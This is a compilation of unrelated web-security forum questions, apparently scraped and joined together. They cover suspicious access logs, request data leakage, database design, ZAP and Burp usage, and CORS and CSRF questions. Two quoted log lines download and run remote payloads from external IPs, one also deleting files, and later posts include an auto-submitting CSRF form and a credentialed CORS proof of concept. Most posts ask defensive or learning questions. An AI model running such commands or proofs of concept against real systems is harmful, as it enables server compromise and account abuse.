Very Strange Access Request to my website

Recently I got a very odd request to my website. This is from the log file:

20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 20.42.89.182 - - [12/Aug/2020:18:48:13 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 302 195 "-" "-" 

It appears to be trying to run some shell commands, including what I believe to be downloading the source of a site with cURL. I tried to visit this URL but it was blocked by my security filter. What is kerbynet? Is this part of cloudflare and can it be used to run shell commands on my website?

It should be noted that I use Cloudflare.

What is the term for data leaking from one HTTP request to another and how to prevent it?


Context

We recently added a feature that used a library whose API we misunderstood. Long story short, if user A sends a request to our web application, the library caches some result, and that result may show in a response to user B’s request. Needless to say, this is a security bug, specifically, data from user A leaks to user B.

Although it is well-known that web application should be stateless, the long dependency graph of such application makes the likelihood of some downstream library (or its bad usage) accidentally leaking data between requests non-zero. I can imagine this bug is possible with a wide range of web frameworks and environments (e.g., Django, .NET, NodeJS, AWS Lambda), since they all reuse the application between request to avoid cold starts.

Questions

  1. What is the proper term for data leaking server-side between HTTP requests, due to an honest developer mistake? Terms such as session hijacking and session fixation seem to refer exclusively to malicious attacks.

  2. Are there tools and method to test for such mistakes or detect them in production?

How can a ‘Request’ store a ‘Result’ code and its associated ‘Error’ code and still enforce the relationship between Result and Error?

I’m an application developer creating the database structure to represent a flat file message format. I’d like to ask the collective knowledge the best/correct way to represent the following scenario:

Request table (PK: RequestID) contains requests; a request has a Result property which is indeterminate (null) until the request has completed.

Result table (PK ResultID) is a lookup table containing (currently) two possible results:

  • Success (Result ID = 0)
  • Failure (Result ID = 1)

ErrorCode table (PK ErrorCodeID) is a lookup table containing error details and their parent ResultID:

  • No Error (ErrorCodeID = 0, ResultID = 0)
  • Generic Error (ErrorCodeID = 1, ResultID = 1)
  • Queue Full (ErrorCodeID = 2, ResultID = 1)
  • Unsupported Interface (ErrorCodeID = 3, ResultID = 1)
  • etc…

I’ve created a one to many relationship between Result (one) and ErrorCode (many). A ‘Success’ Result can only have a ‘No Error’ Error Code, while a ‘Failure’ Result can have a single error code of ‘Generic Error’, ‘Queue Full’, ‘Unsupported Interface’, etc.

When the Request has completed, I need to store the result and its associated error code.

I’ve thought of combining the two tables but that strikes me as repeating columns.

I’ve also thought of having the Request table store the ResultID and the ErrorCodeID but this doesn’t enforce the Result to ErrorCode relationship.

I’m a big believer in database that ‘defends itself’ from bad data so I want the relationship to reject a Result/ErrorCode combination that is invalid; a.k.a. a Result of ‘Success’ and an ErrorCode of ‘Generic Error’ or a Result of ‘Failure’ and an ErrorCode of ‘No Error’.

I’m also a big believer in solid initial design so when changes come down the pike at a later date (as they always do) the structure will not need rework.

Thank you in advance for your time.

Regards, John E.

OWASP ZAP bruteforce 3 parameters Request from 3 payloads (parallel)

How i can fuzz request with 3 parameters(locations) and 3 payloads

request1 => parameter1=payload1.1; parameter2=payload2.1; parameter3=payload3.1;

request2 => parameter1=payload1.2; parameter2=payload2.2; parameter3=payload3.2;

request3 => parameter1=payload1.3; parameter2=payload2.3; parameter3=payload3.3;

Where payload1.2 means take string#2 from payload1 … etc

Thanks.

Burp Suite can not intercept the wget and curl HTTP request

I use Burp Suite as proxy listen 127.0.0.1:8080, and I also set the HTTP Proxy as 127.0.0.1:8080.

now Burp Suite can intercept all the browsers(eg. firefox, safari, chrome), and application(eg. dictionary ) on my Mac: enter image description here


but can not intercept the wget and curl‘s request.

such as:

curl www.apple.com 

Isn’t curl and wget using HTTP protocol requests?


EDIT-01

  1. Why I set macOS preferences HTTP Proxy to 127.0.0.1:8080, all the browsers and applications will use this Proxy by default? I did not set in each browser.

  2. Why curl and wget do not use the proxy by default? even I set –proxy still not work.

wget www.cloud123.com --proxy 127.0.0.1:8080 

Cross-Domain Request is a CSRF Attack? (CORS)

CORS is a HTTP Suite header that “relax” the SOP. One of the CORS misconfigurations is about to reflect without reg exp the “Origin” client header into “ACAO” response header. If it happens with “ACAC:true” every cross-domain HTTP request is allowed.

If an attacker induces a victim to visit with another tab of the browser, a malicious web server with a Javascript CORS exploit; the browser triggered by exploit does a HTTP request to a vulnerable webpage and sends the output to a web server controlled by the attacker.

It happens because CORS has a misconfiguration and because the vulnerable page doesn’t have a CSRF Token.

Was this Cross-Domain HTTP request essentially a CSRF attack? If yes, it happens because there is a CORS misconfiguration and there isn’t the CSRF Token? What happens if it has a Anti-XSRF Token?

I read that CORS and SOP can’t block a CSRF attack, because the policy prevents only to access to the response on the request, but the HTTP request works anyway.

If CORS and SOP can’t block a CSRF attack, the CSRF attack could work also if the web server target is not vulnerable a CORS misconfiguration?

Why request shell commands from nginx?

I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs:

170.81.46.70 - -  "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world" 93.157.62.102 - -  "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 218.161.62.117 - -  "GET / HTTP/1.1" 400 157 "-" "-" 61.96.64.130 - -  "GET / HTTP/1.1" 400 157 "-" "-" 

The IPs are, needless to say, not expected for this server.

I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries?

Cross-Site Request Forgery from another origin

I’m trying to solve one of the challange of owasp juice shop. After some attempts, I started looking for a solution (this) and it’s exactly what I did, but it doesn’t work.

I’m running on a local docker the app (tried also online, but same problem).

On the console I get

Uncaught DOMException: Permission denied to access property "document" on cross-origin object

and it’s ok since that’s what I’m expecting to see, but when I go in the user profile the username didn’t change. In the network panel of the console I can see the packet being send (for the SOP I can’t see the response), so I don’t know what the problem can be.

What I’m doing wrong?Is my understanding of the attack wrong or is just a problem with the implementation of the webapp?

CSRF: GET request with POST data?

I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a POST request. Using usual exploitation techniques, I crafted the following webpage.

<html>     <head></head>     <body>         <span>csrf test</span>          <form action="http://vulnerable.com/friendRequest.asp" method="POST">             <input type="hidden" name="MessageArea" value="this is a test of csrf">             <input type="hidden" name="FriendName" value="testuser">         </form>          <script>             document.forms[0].submit();         </script>      </body> </html> 

Unfortunately though, the website checks for the origin header in the request, so this payload doesn’t work. Switching to a GET request and deleting the origin header actually sends the request successfully. The request looks like the following.

GET /friendRequest.asp HTTP/1.1 Host: www.vulnerable.com User-Agent: Mozilla/5.0 ... (no origin header) Cookie: secret_cookie  MessageArea=this+is+a+test+for+csrf&FriendName=testuser 

As you can see this is a GET request with POST data sent at the bottom. Unfortunately the request doesn’t go through with the parameters in the URL like in a true GET request. Is there any way to use an external form (like the one above) to send a malformed GET request with POST data to achieve this CSRF? I have looked into XMLHttpRequest and fetch but I’m not sure that they are the right tools for the job.

Is it possible to send a POST CORS request with json data?

Is it possible to send a custom POST CORS request with json data?

I found that the website example.com is vulnerable to CORS and it’s accepting my origin header:

https://mywebsite.com

, however the request is a POST one and if i try without any post data i get: {"errorCode":"invalid","message":"Invalid json body","statusCode":400}

I was wondering if it’s possible to send cors requests containing json data. If it’s possible how should i edit my proof of concept code?

At the moment i’m using the following:

<script> var createCORSRequest = function(method, url) {   var xhr = new XMLHttpRequest();   if ("withCredentials" in xhr) {     // Most browsers.     xhr.open(method, url, true);   } else if (typeof XDomainRequest != "undefined") {     // IE8 & IE9     xhr = new XDomainRequest();     xhr.open(method, url);   } else {     // CORS not supported.     xhr = null;   }   return xhr; };  var url = 'https://example.com/api/v1/post'; var method = 'POST'; var xhr = createCORSRequest(method, url);  xhr.onload = function() {   // Success code goes here. };  xhr.onerror = function() {   // Error code goes here. };  xhr.withCredentials = true; xhr.send(); </script> 

But i’ll need to add {"id":"test","name":"test"} as POST json data to my PoC to make it work. How could i do that?